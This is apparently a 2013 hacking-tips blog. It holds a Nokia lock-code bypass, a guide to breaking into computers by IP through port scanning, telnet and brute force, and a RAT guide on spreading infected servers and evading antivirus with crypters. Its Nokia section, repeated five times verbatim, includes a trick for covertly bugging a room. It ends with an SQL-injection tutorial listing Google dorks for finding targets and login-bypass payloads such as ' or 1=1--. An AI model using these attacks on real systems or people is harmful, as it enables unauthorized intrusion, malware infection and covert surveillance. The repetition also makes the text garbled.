Wednesday 20 February 2013

Saturday 16 February 2013

How to reset/Unlock Nokia Lock Code without any software

There have been several tutorials and questions on internet that shows how to reset the security locking code of your Nokia Symbian Phones. But honestly speaking, non of the tutorial works. Because, most of them keeps talking about Master Code security code which really does not work in every phone.
The technique behind Master code is that, every phone has unique International Mobile Equipment Identity (IMEI) number and with the help of this number, a specific software will calculate your so called master code. This might work in some phone but not always. Because how can you be so sure about that the Master Code generated is the correct one? If it has been the straight right security code then there won’t be any use of security code. Because, Lock codes and master codes are meant for security purpose in case if it’s stolen or lost some where.
Therefore this might not be much practical. The good thing you can do is, contact the authorized service center to have your code reseted. If you don’t want to do that then still you have a choice left. That is, you’ll have to hack the phone. Don’t worry with the term ‘hack’ we’ll do nothing like hacking.
We’ll use a backdoor to reset the security code. This might be illegal, but can be helpful if you badly need it. Here is how you do it.
First of all download the security code hack patch from here. Once you have downloaded it extract it with your favorite unzipper.  Now reate a new folder ‘Recogs‘ in your desktop.

za How to reset Nokia Lock Code without any software
New Recogs folder in desktop
Once it has been created, copy the THC-NOKIA-UNLOCK.MDLfile from the extracted file to Recogs folder.
zb How to reset Nokia Lock Code without any software
Drag or copy the file to Recogs folder
Now take out the memory card from your Nokia phone and plug it in to you card reader and open it from my computer.
zc How to reset Nokia Lock Code without any software
Open your card from my computer
Once you open go to System folder. If it is not there then don’t worry it is hidden folder. To go to System folder, type ‘system‘ next to your card location as shown in the image below (in this tutorial the drive letter for the memory card is H:).
zd How to reset Nokia Lock Code without any software
Type-in system to go to system folder
Instantly you’ll be inside system folder.
ze How to reset Nokia Lock Code without any software
The System folder
Once you are inside the system folder copy the Recogs folder from desktop to the system.
zf How to reset Nokia Lock Code without any software
Recogs folder being copied to system folder
Finally when it’s copied, eject your memory card and insert it to your phone which you want to unlock. Once you insert the memory card, it will automatically start the unclocker file and resets the Locking code.
Once it succesfully resets your Locking code, it will prompt a message on white screen with, ‘Press a Key’. Press any key and your code is rested to 12345. Now you can change it any time.
Thats it, you are done. No need of any electronic device, no need of any data cards no need of any complicated and insecure software and the phone is yours again.
If you enjoyed this tutorial then subscribe to us for free and also bookmark us

Ufone Secret Codes – Ufone Commands

 
Shortcuts:
##004# Deactivate Voice Mail **004*190# Activate Voice Mail
*43# Activate Call Waiting #43# Deactivate Call Waiting
*124# Free Balance Check
*123*(PIN)# Balance Recharge
*444*1# Ufone Prepay 2 Ufone Public Demand Conversion*444*2# Ufone Public Demand 2 Ufone Prepay Conversion
*#21# Allows you to check the number that “All Calls” are diverted to.
*#30# Lets you see the private number.
*#61# Allows you to check the number that “On No Reply” calls are diverted to.
*#62# Allows you to check the number that “Divert If Unreachable (no service)” calls are diverted to.
*#67# Allows you to check the number that “On Busy Calls” are diverted to.
CLIR: Presentation of one’s own number to the to the called party
Activate CLIR **31#
Activate CLIR for the actual call *31#number
Deactivate CLIR ##31#
Deactivate CLIR for the actual call #31#number
Check status of CLIR *#31#
De-register all call diversions ##002#
Activate unconditionally divert all calls *21#
De-register unconditionally divert all calls ##21#
Deactivate unconditionally divert all calls #21#
Check status of unconditionally divert all calls *#21#
Divert on no answer to number and activate **61*number#
Activate divert on no answer *61#
Activate divert on busy *67# De-register divert on busy ##67#
Deactivate divert on busy #67# Check status of divert on busy *#67#
Check status of barr all outgoing calls *#33# Activate barr all calls **330*code#
Deactivate barr all calls #330*code#
Check status of barr all calls *#330*code#
Activate barr all outgoing calls **333*code#
Deactivate barr all outgoing calls #333*code#
Check status of barr all outgoing calls *#333#
Activate barr all incoming calls **35*code#
Deactivate barr all incoming calls #35*code#
Check status of barr all incoming calls *#35#
Activate barr all incoming calls when roaming **351*code#
Deactivate barr all incoming calls when roaming #351*code#
Check status of barr all incoming calls when roaming *#351#
Activate barr all incoming calls **353*code#
Deactivate barr all incoming calls #353*code#
Check status of barr all incoming calls *#353#

Hack Computer/pc using ip Adress

Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.

  1. Confirm the website or a computer you want to hack.
  2. Find or trace their IP address.
  3. Make sure that IP address is online
  4. Scan for open ports
  5. Check for venerable ports
  6. access through the port
  7. Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com




This is how we can get the IP address of the victims website.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
You might find this article helpful
Now you got the IP address right? Is it online? To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.

Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]


You’ll be asked to input login information.

If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.
In this way you’ll able to hack remove computer using only IP addres

What is a RAT (Remote Administrator Tool)

A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.

What can RAT do?

With a RAT, you can make the party download files, view their desktop/webcam, and more. Here is a list of basic features of a popular RAT:

* Manage files
* Control web browser (Change homepage, open site etc.)
* Get system information (OS Version, AV name, Ram Memory, Computer name etc.)
* Get passwords, credit card numbers or private data etc.
* View and remote control desktop
* Record camera & sound
* Control mouse
* Delete, rename, download, upload or move files

Are RATs Illegal?

Some RATs are legal, and some are not. Legal are the one without backdoor left, and they have ability to close connection anytime. Illegal are used for hacking and they can steal data (Credit Cards, Passwords, private data etc.).Here is a list of some Legal and Illegal RATs:

Legal:

* TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
* UltraVNC – Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance
* Ammyy Admin – Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote
* Mikogo – Mikogo is an Online Meeting, Web Conferencing & Remote Support tool where you can share your screen with 10 participants in real-time over the Web.

Illegal:

* Spy-Net
* Cerberus Rat
* CyberGate Rat
* SubSeven
* Turkojan
* ProRat
   Darkcomet

How do I use these RATs?

For the legal RATs, for example, TeamViewer, give the other party your ID and password (the one who is getting viewed gives the other the information). The other connection then puts the ID. You then have many options to choose from, which are self explanatory (once connected).

For the illegal Rats, you need to portforward it to listen onto a port. You then need to build a server, spread it to others, they run your program, and they’re infected.

How do I port forward?

Port forwarding is easy and important for an illegal RAT. You need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your rooter (write Username: Admin & Password: Admin), open port forward page and write port you want and your IP. Well that’s all you need to do and now you got open port.

How do I control server?

Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.

Where and how do I spread?

There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites (uTorrent, Pirate bay etc.), YouTube, etc. Some people use custom made Auto-Spreaders programs to spread their server.

What’s reverse Connection?

A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.

Whats Direct Connection?

A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.

FAQs (Frequently Asked Questions) about RATs

Q – Why my RAT server is detected by the most anti-virus software?
A – If you want to make your server FUD (Fully UnDetectable), you will need crypter. Also, you can hex edit your server, but be careful some servers can crash after hex editing.

Q – Can I get infected by using a RAT?
A – If the programmer that gives a download link to the RAT backdoors it (very possible), then yes. By simply downloading a file, you can be infected and vulnerable to many things. By using a legal rat, chances are you won’t be infected.

Q – How do I remove server if I infect myself?
A – When you infect yourself, first what you going to do is to connect to your PC. Some RATs have function to uninstall servers, well you click that and you uninstall it. There is another way, download MalwareBytes’ Anti-Malware and scan whole computer for trojans.

Q – Can I get traced when I rat somebody?
A – Yes and no. Depends on victim, it is really hard to remove infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace, because PC usually got over 300 connections. So don’t worry.

Thursday 14 February 2013

NOKIA Tips

Mobils in the next millenium acourding to NOKIA

Send an E-mail from your GSM


From your telephone you can send an email to whichever E-mail customer of the Internet network.

The e-mail will be sent to the maximum of within an hour from the reception.

The sended message will contain in luminosity the telephone number of the sender.

In order for sending e-mail, send an SMS with this syntax (always separated by spaces):

EMA name@domain text-of-your-email

Example: in order to send an email to john@doe.com, do the following:

EMA john@doe.com text-of-your-email

if your phone cant print @ replace it with a !

EMA johon!doe.com text-of-your-email

And then send this message to the folloving number: +39 338 8641732










Codes (that they dont tell you in the manual)
To check the IMEI (International Mobile Equipment Identity) type: *#06#

Information you get from the IMEI:
XXXXXX XX XXXXXX X
TAC FAC SNR SP

TAC = Type Approval Code (first 2 digits = country code).

FAC = Final Assembly Code (For Nokia phones FAC=10).

SNR = Serial Number.

SP = Spare (always SP=0).



To check the phone's software (firmware revision information) type: *#0000# ( or for some phones outher then Nokia 61XX you can try *#model nummber# ex. for 8110 *#8110#)

Information you can get from the phone's software version:
V 3.14
28-11-97
NSE-3

1st line: Software version.
2nd line: The date of the software release.
3nd line: Phone type, .


Some versions and dates:

V 3.14 28/11/97

V4.33 11/03/98

V 4.73 22/04/98

V 5.24 14/9/98







Pin-Out Diagram for the 6110




1 - VIN CHARGER INPUT VOLTAGE 8.4V 0.8A
2 - CHRG CTRL CHARGER CONTROL PWM 32Khz
3 - XMIC MIC INPUT 60mV - 1V
4 - SGND SIGNAL GROUND
5 - XEAR EAR OUTPUT 80mV - 1V
6 - MBUS 9600 B/S
7 - FBUS_RX 9.6 - 230.4 KB/S
8 - FBUS_TX 9.6 - 230.4 KB/S
9 - L_GND CHARGER / LOGIC GND




Revealing Headphone and Car-Kit Menus
Think about this: If you do these tricks the new menus can not be erased after the procedure. But it's not dangerous or harmful for your phone

To enable the headset-function, you have to short-circuit the "3" and "4". After a short time there is "Headset" on the display Now, menu 3-6 is now enabled!

To enable the carkit-function you have to short-circuit the "4" and "5". After a short time, "Car" is shown on the display and the menu 3-7 is enabled!!

This Trick is for you how want to hear more then your supposed to !

If you short-circuit the left and the right contact with the middle contact ("3", "6" and "9") the Nokia Software hangs! The profile "Headset" will be activated. Before you do this, just active the "auto call receive" function in the headphone profile and set the ringing volume to "mute" Now you can use your phone for checking out what people are talking about in a room. Place the phone somewhere stratidic and call your phone! The phone receives the call without ringing and you can listen to what people are talking about! .....gr8...



Serial numbers on your 6110
For more info type: *#92702689#
The first screen gives you the serial and IMEI number.
Then there is the Date of Manufacture: ex. Made 1297
Then there is the Purchasing Date: ex. Purchasing Date 0298
Then there is the last Repair Date: ex. Repaired: 0000

Note: you must turn off the phone to exit after this test, because of the last function, "transfer user data" which doesn't work as "standard"....You can use this mode only to transfer all Calender, Profile and Callers Group Information to another phone (eg. if you are replacing phone or configuring phones for use within your company or when a particular phone doesn't works correctly )





Activating and deactivating EFR and HFR, on your 6110

*3370# to activate Enhanced Full Rate - Makes calls sound better, but decreases the battery life by about 5%.

#3370# to deactivate Enhanced Full Rate

*4720# to activate Half Rate Mode - Drops call quality, but increases battery life by about 30%.

#4720# to deactivate Half Rate Mode







Add new tones to your 6110 (whitout using a computer)
How to get new ringing tones :
Set SMSC (message central) to +358405202999
send an SMS with the word
TONES
Send it to 99999
When you get the reply (this will be in a markup language)
go to edit the message so the tone you want is the only without an
asterix (*) in front of it. Then send this message to 99999 again.
This will then send a ringtone to you.
If it works, it should says: NEW RINGTONE RECEIVED.
Then you can play it, discard it or accept it as tone no.36 (the personal one

NOKIA Tips

Mobils in the next millenium acourding to NOKIA

Send an E-mail from your GSM


From your telephone you can send an email to whichever E-mail customer of the Internet network.

The e-mail will be sent to the maximum of within an hour from the reception.

The sended message will contain in luminosity the telephone number of the sender.

In order for sending e-mail, send an SMS with this syntax (always separated by spaces):

EMA name@domain text-of-your-email

Example: in order to send an email to john@doe.com, do the following:

EMA john@doe.com text-of-your-email

if your phone cant print @ replace it with a !

EMA johon!doe.com text-of-your-email

And then send this message to the folloving number: +39 338 8641732










Codes (that they dont tell you in the manual)
To check the IMEI (International Mobile Equipment Identity) type: *#06#

Information you get from the IMEI:
XXXXXX XX XXXXXX X
TAC FAC SNR SP

TAC = Type Approval Code (first 2 digits = country code).

FAC = Final Assembly Code (For Nokia phones FAC=10).

SNR = Serial Number.

SP = Spare (always SP=0).



To check the phone's software (firmware revision information) type: *#0000# ( or for some phones outher then Nokia 61XX you can try *#model nummber# ex. for 8110 *#8110#)

Information you can get from the phone's software version:
V 3.14
28-11-97
NSE-3

1st line: Software version.
2nd line: The date of the software release.
3nd line: Phone type, .


Some versions and dates:

V 3.14 28/11/97

V4.33 11/03/98

V 4.73 22/04/98

V 5.24 14/9/98







Pin-Out Diagram for the 6110




1 - VIN CHARGER INPUT VOLTAGE 8.4V 0.8A
2 - CHRG CTRL CHARGER CONTROL PWM 32Khz
3 - XMIC MIC INPUT 60mV - 1V
4 - SGND SIGNAL GROUND
5 - XEAR EAR OUTPUT 80mV - 1V
6 - MBUS 9600 B/S
7 - FBUS_RX 9.6 - 230.4 KB/S
8 - FBUS_TX 9.6 - 230.4 KB/S
9 - L_GND CHARGER / LOGIC GND




Revealing Headphone and Car-Kit Menus
Think about this: If you do these tricks the new menus can not be erased after the procedure. But it's not dangerous or harmful for your phone

To enable the headset-function, you have to short-circuit the "3" and "4". After a short time there is "Headset" on the display Now, menu 3-6 is now enabled!

To enable the carkit-function you have to short-circuit the "4" and "5". After a short time, "Car" is shown on the display and the menu 3-7 is enabled!!

This Trick is for you how want to hear more then your supposed to !

If you short-circuit the left and the right contact with the middle contact ("3", "6" and "9") the Nokia Software hangs! The profile "Headset" will be activated. Before you do this, just active the "auto call receive" function in the headphone profile and set the ringing volume to "mute" Now you can use your phone for checking out what people are talking about in a room. Place the phone somewhere stratidic and call your phone! The phone receives the call without ringing and you can listen to what people are talking about! .....gr8...



Serial numbers on your 6110
For more info type: *#92702689#
The first screen gives you the serial and IMEI number.
Then there is the Date of Manufacture: ex. Made 1297
Then there is the Purchasing Date: ex. Purchasing Date 0298
Then there is the last Repair Date: ex. Repaired: 0000

Note: you must turn off the phone to exit after this test, because of the last function, "transfer user data" which doesn't work as "standard"....You can use this mode only to transfer all Calender, Profile and Callers Group Information to another phone (eg. if you are replacing phone or configuring phones for use within your company or when a particular phone doesn't works correctly )





Activating and deactivating EFR and HFR, on your 6110

*3370# to activate Enhanced Full Rate - Makes calls sound better, but decreases the battery life by about 5%.

#3370# to deactivate Enhanced Full Rate

*4720# to activate Half Rate Mode - Drops call quality, but increases battery life by about 30%.

#4720# to deactivate Half Rate Mode







Add new tones to your 6110 (whitout using a computer)
How to get new ringing tones :
Set SMSC (message central) to +358405202999
send an SMS with the word
TONES
Send it to 99999
When you get the reply (this will be in a markup language)
go to edit the message so the tone you want is the only without an
asterix (*) in front of it. Then send this message to 99999 again.
This will then send a ringtone to you.
If it works, it should says: NEW RINGTONE RECEIVED.
Then you can play it, discard it or accept it as tone no.36 (the personal one

NOKIA Tips

Mobils in the next millenium acourding to NOKIA

Send an E-mail from your GSM


From your telephone you can send an email to whichever E-mail customer of the Internet network.

The e-mail will be sent to the maximum of within an hour from the reception.

The sended message will contain in luminosity the telephone number of the sender.

In order for sending e-mail, send an SMS with this syntax (always separated by spaces):

EMA name@domain text-of-your-email

Example: in order to send an email to john@doe.com, do the following:

EMA john@doe.com text-of-your-email

if your phone cant print @ replace it with a !

EMA johon!doe.com text-of-your-email

And then send this message to the folloving number: +39 338 8641732










Codes (that they dont tell you in the manual)
To check the IMEI (International Mobile Equipment Identity) type: *#06#

Information you get from the IMEI:
XXXXXX XX XXXXXX X
TAC FAC SNR SP

TAC = Type Approval Code (first 2 digits = country code).

FAC = Final Assembly Code (For Nokia phones FAC=10).

SNR = Serial Number.

SP = Spare (always SP=0).



To check the phone's software (firmware revision information) type: *#0000# ( or for some phones outher then Nokia 61XX you can try *#model nummber# ex. for 8110 *#8110#)

Information you can get from the phone's software version:
V 3.14
28-11-97
NSE-3

1st line: Software version.
2nd line: The date of the software release.
3nd line: Phone type, .


Some versions and dates:

V 3.14 28/11/97

V4.33 11/03/98

V 4.73 22/04/98

V 5.24 14/9/98







Pin-Out Diagram for the 6110




1 - VIN CHARGER INPUT VOLTAGE 8.4V 0.8A
2 - CHRG CTRL CHARGER CONTROL PWM 32Khz
3 - XMIC MIC INPUT 60mV - 1V
4 - SGND SIGNAL GROUND
5 - XEAR EAR OUTPUT 80mV - 1V
6 - MBUS 9600 B/S
7 - FBUS_RX 9.6 - 230.4 KB/S
8 - FBUS_TX 9.6 - 230.4 KB/S
9 - L_GND CHARGER / LOGIC GND




Revealing Headphone and Car-Kit Menus
Think about this: If you do these tricks the new menus can not be erased after the procedure. But it's not dangerous or harmful for your phone

To enable the headset-function, you have to short-circuit the "3" and "4". After a short time there is "Headset" on the display Now, menu 3-6 is now enabled!

To enable the carkit-function you have to short-circuit the "4" and "5". After a short time, "Car" is shown on the display and the menu 3-7 is enabled!!

This Trick is for you how want to hear more then your supposed to !

If you short-circuit the left and the right contact with the middle contact ("3", "6" and "9") the Nokia Software hangs! The profile "Headset" will be activated. Before you do this, just active the "auto call receive" function in the headphone profile and set the ringing volume to "mute" Now you can use your phone for checking out what people are talking about in a room. Place the phone somewhere stratidic and call your phone! The phone receives the call without ringing and you can listen to what people are talking about! .....gr8...



Serial numbers on your 6110
For more info type: *#92702689#
The first screen gives you the serial and IMEI number.
Then there is the Date of Manufacture: ex. Made 1297
Then there is the Purchasing Date: ex. Purchasing Date 0298
Then there is the last Repair Date: ex. Repaired: 0000

Note: you must turn off the phone to exit after this test, because of the last function, "transfer user data" which doesn't work as "standard"....You can use this mode only to transfer all Calender, Profile and Callers Group Information to another phone (eg. if you are replacing phone or configuring phones for use within your company or when a particular phone doesn't works correctly )





Activating and deactivating EFR and HFR, on your 6110

*3370# to activate Enhanced Full Rate - Makes calls sound better, but decreases the battery life by about 5%.

#3370# to deactivate Enhanced Full Rate

*4720# to activate Half Rate Mode - Drops call quality, but increases battery life by about 30%.

#4720# to deactivate Half Rate Mode







Add new tones to your 6110 (whitout using a computer)
How to get new ringing tones :
Set SMSC (message central) to +358405202999
send an SMS with the word
TONES
Send it to 99999
When you get the reply (this will be in a markup language)
go to edit the message so the tone you want is the only without an
asterix (*) in front of it. Then send this message to 99999 again.
This will then send a ringtone to you.
If it works, it should says: NEW RINGTONE RECEIVED.
Then you can play it, discard it or accept it as tone no.36 (the personal one

NOKIA Tips

Mobils in the next millenium acourding to NOKIA

Send an E-mail from your GSM


From your telephone you can send an email to whichever E-mail customer of the Internet network.

The e-mail will be sent to the maximum of within an hour from the reception.

The sended message will contain in luminosity the telephone number of the sender.

In order for sending e-mail, send an SMS with this syntax (always separated by spaces):

EMA name@domain text-of-your-email

Example: in order to send an email to john@doe.com, do the following:

EMA john@doe.com text-of-your-email

if your phone cant print @ replace it with a !

EMA johon!doe.com text-of-your-email

And then send this message to the folloving number: +39 338 8641732










Codes (that they dont tell you in the manual)
To check the IMEI (International Mobile Equipment Identity) type: *#06#

Information you get from the IMEI:
XXXXXX XX XXXXXX X
TAC FAC SNR SP

TAC = Type Approval Code (first 2 digits = country code).

FAC = Final Assembly Code (For Nokia phones FAC=10).

SNR = Serial Number.

SP = Spare (always SP=0).



To check the phone's software (firmware revision information) type: *#0000# ( or for some phones outher then Nokia 61XX you can try *#model nummber# ex. for 8110 *#8110#)

Information you can get from the phone's software version:
V 3.14
28-11-97
NSE-3

1st line: Software version.
2nd line: The date of the software release.
3nd line: Phone type, .


Some versions and dates:

V 3.14 28/11/97

V4.33 11/03/98

V 4.73 22/04/98

V 5.24 14/9/98







Pin-Out Diagram for the 6110




1 - VIN CHARGER INPUT VOLTAGE 8.4V 0.8A
2 - CHRG CTRL CHARGER CONTROL PWM 32Khz
3 - XMIC MIC INPUT 60mV - 1V
4 - SGND SIGNAL GROUND
5 - XEAR EAR OUTPUT 80mV - 1V
6 - MBUS 9600 B/S
7 - FBUS_RX 9.6 - 230.4 KB/S
8 - FBUS_TX 9.6 - 230.4 KB/S
9 - L_GND CHARGER / LOGIC GND




Revealing Headphone and Car-Kit Menus
Think about this: If you do these tricks the new menus can not be erased after the procedure. But it's not dangerous or harmful for your phone

To enable the headset-function, you have to short-circuit the "3" and "4". After a short time there is "Headset" on the display Now, menu 3-6 is now enabled!

To enable the carkit-function you have to short-circuit the "4" and "5". After a short time, "Car" is shown on the display and the menu 3-7 is enabled!!

This Trick is for you how want to hear more then your supposed to !

If you short-circuit the left and the right contact with the middle contact ("3", "6" and "9") the Nokia Software hangs! The profile "Headset" will be activated. Before you do this, just active the "auto call receive" function in the headphone profile and set the ringing volume to "mute" Now you can use your phone for checking out what people are talking about in a room. Place the phone somewhere stratidic and call your phone! The phone receives the call without ringing and you can listen to what people are talking about! .....gr8...



Serial numbers on your 6110
For more info type: *#92702689#
The first screen gives you the serial and IMEI number.
Then there is the Date of Manufacture: ex. Made 1297
Then there is the Purchasing Date: ex. Purchasing Date 0298
Then there is the last Repair Date: ex. Repaired: 0000

Note: you must turn off the phone to exit after this test, because of the last function, "transfer user data" which doesn't work as "standard"....You can use this mode only to transfer all Calender, Profile and Callers Group Information to another phone (eg. if you are replacing phone or configuring phones for use within your company or when a particular phone doesn't works correctly )





Activating and deactivating EFR and HFR, on your 6110

*3370# to activate Enhanced Full Rate - Makes calls sound better, but decreases the battery life by about 5%.

#3370# to deactivate Enhanced Full Rate

*4720# to activate Half Rate Mode - Drops call quality, but increases battery life by about 30%.

#4720# to deactivate Half Rate Mode







Add new tones to your 6110 (whitout using a computer)
How to get new ringing tones :
Set SMSC (message central) to +358405202999
send an SMS with the word
TONES
Send it to 99999
When you get the reply (this will be in a markup language)
go to edit the message so the tone you want is the only without an
asterix (*) in front of it. Then send this message to 99999 again.
This will then send a ringtone to you.
If it works, it should says: NEW RINGTONE RECEIVED.
Then you can play it, discard it or accept it as tone no.36 (the personal one

NOKIA Tips

Mobils in the next millenium acourding to NOKIA

Send an E-mail from your GSM


From your telephone you can send an email to whichever E-mail customer of the Internet network.

The e-mail will be sent to the maximum of within an hour from the reception.

The sended message will contain in luminosity the telephone number of the sender.

In order for sending e-mail, send an SMS with this syntax (always separated by spaces):

EMA name@domain text-of-your-email

Example: in order to send an email to john@doe.com, do the following:

EMA john@doe.com text-of-your-email

if your phone cant print @ replace it with a !

EMA johon!doe.com text-of-your-email

And then send this message to the folloving number: +39 338 8641732










Codes (that they dont tell you in the manual)
To check the IMEI (International Mobile Equipment Identity) type: *#06#

Information you get from the IMEI:
XXXXXX XX XXXXXX X
TAC FAC SNR SP

TAC = Type Approval Code (first 2 digits = country code).

FAC = Final Assembly Code (For Nokia phones FAC=10).

SNR = Serial Number.

SP = Spare (always SP=0).



To check the phone's software (firmware revision information) type: *#0000# ( or for some phones outher then Nokia 61XX you can try *#model nummber# ex. for 8110 *#8110#)

Information you can get from the phone's software version:
V 3.14
28-11-97
NSE-3

1st line: Software version.
2nd line: The date of the software release.
3nd line: Phone type, .


Some versions and dates:

V 3.14 28/11/97

V4.33 11/03/98

V 4.73 22/04/98

V 5.24 14/9/98







Pin-Out Diagram for the 6110




1 - VIN CHARGER INPUT VOLTAGE 8.4V 0.8A
2 - CHRG CTRL CHARGER CONTROL PWM 32Khz
3 - XMIC MIC INPUT 60mV - 1V
4 - SGND SIGNAL GROUND
5 - XEAR EAR OUTPUT 80mV - 1V
6 - MBUS 9600 B/S
7 - FBUS_RX 9.6 - 230.4 KB/S
8 - FBUS_TX 9.6 - 230.4 KB/S
9 - L_GND CHARGER / LOGIC GND




Revealing Headphone and Car-Kit Menus
Think about this: If you do these tricks the new menus can not be erased after the procedure. But it's not dangerous or harmful for your phone

To enable the headset-function, you have to short-circuit the "3" and "4". After a short time there is "Headset" on the display Now, menu 3-6 is now enabled!

To enable the carkit-function you have to short-circuit the "4" and "5". After a short time, "Car" is shown on the display and the menu 3-7 is enabled!!

This Trick is for you how want to hear more then your supposed to !

If you short-circuit the left and the right contact with the middle contact ("3", "6" and "9") the Nokia Software hangs! The profile "Headset" will be activated. Before you do this, just active the "auto call receive" function in the headphone profile and set the ringing volume to "mute" Now you can use your phone for checking out what people are talking about in a room. Place the phone somewhere stratidic and call your phone! The phone receives the call without ringing and you can listen to what people are talking about! .....gr8...



Serial numbers on your 6110
For more info type: *#92702689#
The first screen gives you the serial and IMEI number.
Then there is the Date of Manufacture: ex. Made 1297
Then there is the Purchasing Date: ex. Purchasing Date 0298
Then there is the last Repair Date: ex. Repaired: 0000

Note: you must turn off the phone to exit after this test, because of the last function, "transfer user data" which doesn't work as "standard"....You can use this mode only to transfer all Calender, Profile and Callers Group Information to another phone (eg. if you are replacing phone or configuring phones for use within your company or when a particular phone doesn't works correctly )





Activating and deactivating EFR and HFR, on your 6110

*3370# to activate Enhanced Full Rate - Makes calls sound better, but decreases the battery life by about 5%.

#3370# to deactivate Enhanced Full Rate

*4720# to activate Half Rate Mode - Drops call quality, but increases battery life by about 30%.

#4720# to deactivate Half Rate Mode







Add new tones to your 6110 (whitout using a computer)
How to get new ringing tones :
Set SMSC (message central) to +358405202999
send an SMS with the word
TONES
Send it to 99999
When you get the reply (this will be in a markup language)
go to edit the message so the tone you want is the only without an
asterix (*) in front of it. Then send this message to 99999 again.
This will then send a ringtone to you.
If it works, it should says: NEW RINGTONE RECEIVED.
Then you can play it, discard it or accept it as tone no.36 (the personal one

SQL Injection Basic Tutorial

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


WHAT I DO :

first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting


*******************************************

WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay

103 Run Commands



 Type Any Command In Run

1) Accessibility Controls
- access.cpl

2) Accessibility Wizard
- accwiz

3) Add Hardware Wizard
- hadwwiz.cpl

4) Add/Remove Programs
- appwiz.cpl



5) Administrative Tools
- control admintools

6) Automatic Updates
- wuaucpl.cpl

7) Bluetooth Transfer Wizard
- fsquirt

Part-2


8) Calculator
- calc

9) Certificate Manager
- certmgr.msc

10) Character Map
- charmap

